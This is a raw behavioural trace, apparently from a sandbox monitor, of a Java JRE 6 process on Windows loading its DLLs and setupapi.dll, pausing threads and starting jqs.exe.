Thread delayed Time: 0 TID: 9078 success or wait 2117610643
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2117791030
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2117792402
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2117798403
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117798997
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2117851679
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117852268
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2117878537
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2117879931
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2117886090
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117886679
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2117968186
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117968809
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2117995347
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2117996595
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2118002388
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118002975
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118288945
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118289546
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2118317234
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2118318549
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2118324510
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118325118
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118355812
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118356583
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2118383694
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2118385022
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2118391000
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118391609
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118426692
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118427293
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2118454213
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2118455534
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2118461512
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118462119
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118491470
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118492068
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2118518478
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2118519836
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2118526211
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118526821
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118557091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118557689
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2118584471
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2118585888
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2118593010
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118593625
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118624068
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118624665
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2118651762
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2118653114
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2118659129
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118659737
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118688676
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118689274
Thread delayed Time: 0 TID: 9078 success or wait 2118700938
Thread delayed Time: 0 TID: 9078 success or wait 2118702953
Thread delayed Time: 0 TID: 9078 success or wait 2118703851
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2118720306
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2118721703
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2118727732
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118728340
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118759372
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118759948
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118787176
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118787747
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118815582
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118816158
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2118841679
Section loaded Path: C:\Program Files\Java\jre6\bin\net.dll Access: query and write and read and execute Type: image Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2118843039
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D600000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2118849241
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118849830
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118879170
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118879800
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 2118906061
Section loaded Path: C:\Program Files\Java\jre6\bin\nio.dll Access: query and write and read and execute Type: image Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid success or wait 2118907343
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D620000 Size: 36864 Protection: read write Mapped to pid: own pid object name not found 2118913091
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118913677
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118941760
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119297541
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 278528 Protection: execute Mapped to pid: own pid success or wait 2119323883
Section loaded Path: C:\Program Files\Java\jre6\bin\regutils.dll Access: query and write and read and execute Type: image Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid success or wait 2119325163
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D6A0000 Size: 286720 Protection: read write Mapped to pid: own pid object name not found 2119330943
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119331760
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119626168
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119626778
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 32768 Protection: execute Mapped to pid: own pid success or wait 2119653840
Section loaded Path: C:\Program Files\Java\jre6\bin\verify.dll Access: query and write and read and execute Type: image Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid success or wait 2119655239
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7A0000 Size: 49152 Protection: read write Mapped to pid: own pid object name not found 2119661215
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119661826
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119690843
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119691443
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 49152 Protection: execute Mapped to pid: own pid success or wait 2119725704
Section loaded Path: C:\Program Files\Java\jre6\bin\zip.dll Access: query and write and read and execute Type: image Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid success or wait 2119726987
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7E0000 Size: 61440 Protection: read write Mapped to pid: own pid object name not found 2119732966
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119733578
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2119763015
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2119763633
Thread delayed Time: 0 TID: 9078 success or wait 2119818948
Thread delayed Time: 0 TID: 9078 success or wait 2119820371
Thread delayed Time: 0 TID: 9078 success or wait 2119821729
Thread delayed Time: 0 TID: 9078 success or wait 2120937572
Thread delayed Time: 0 TID: 9078 success or wait 2120938752
Thread delayed Time: 0 TID: 9078 success or wait 2120939992
Thread delayed Time: 0 TID: 9078 success or wait 2122055832
Thread delayed Time: 0 TID: 9078 success or wait 2122057143
Thread created PID: 508 TID: 2732 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2210427760
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2210562047
Section loaded Path: C:\Program Files\Java\jre6\bin\client\classes.jsa Access: query and read Type: commit Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid success or wait 2230741966
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 13369344 Protection: readonly Mapped to pid: own pid object name not found 2230742969
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2230744683
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2231977943
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2231979705
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2251970923
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2251971714
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2251977617
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2251978216
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2252017306
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2252017919
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2253145327
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2253147694
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2253164856
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253166537
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253262436
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253264124
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2253338290
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2253340465
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2253357210
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253358873
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253404684
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253406326
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2253482226
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2253484486
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2253501560
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253503209
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253609152
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253610786
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 323584 Protection: execute Mapped to pid: own pid success or wait 2253702018
Section loaded Path: C:\Program Files\Java\jre6\bin\fontmanager.dll Access: query and write and read and execute Type: image Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid success or wait 2253704323
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D230000 Size: 323584 Protection: read write Mapped to pid: own pid object name not found 2253724430
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253726020
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253813925
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253815662
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 16384 Protection: execute Mapped to pid: own pid success or wait 2253889508
Section loaded Path: C:\Program Files\Java\jre6\bin\hpi.dll Access: query and write and read and execute Type: image Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2253891664
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D280000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 2253908363
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253910103
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2253981984
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2253983617
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 2254015659
Section loaded Path: C:\Program Files\Java\jre6\bin\java.dll Access: query and write and read and execute Type: image Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid success or wait 2254016426
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D320000 Size: 126976 Protection: read write Mapped to pid: own pid object name not found 2254022225
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254022814
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254048993
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254049592
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 147456 Protection: execute Mapped to pid: own pid success or wait 2254075366
Section loaded Path: C:\Program Files\Java\jre6\bin\javaw.exe Access: query and write and read and execute Type: image Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid conflicting addresses 2254076174
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 10B0000 Size: 147456 Protection: read write Mapped to pid: own pid object name not found 2254082181
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254082771
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254109347
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254109929
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 8192 Protection: execute Mapped to pid: own pid success or wait 2254135691
Section loaded Path: C:\Program Files\Java\jre6\bin\jp2native.dll Access: query and write and read and execute Type: image Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 2254136499
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D420000 Size: 24576 Protection: read write Mapped to pid: own pid object name not found 2254142316
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254142905
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254168135
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254168716
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 151552 Protection: execute Mapped to pid: own pid success or wait 2254194428
Section loaded Path: C:\Program Files\Java\jre6\bin\jpeg.dll Access: query and write and read and execute Type: image Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid success or wait 2254195213
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D440000 Size: 151552 Protection: read write Mapped to pid: own pid object name not found 2254201029
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254201619
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254231024
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2254231609
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2254258427
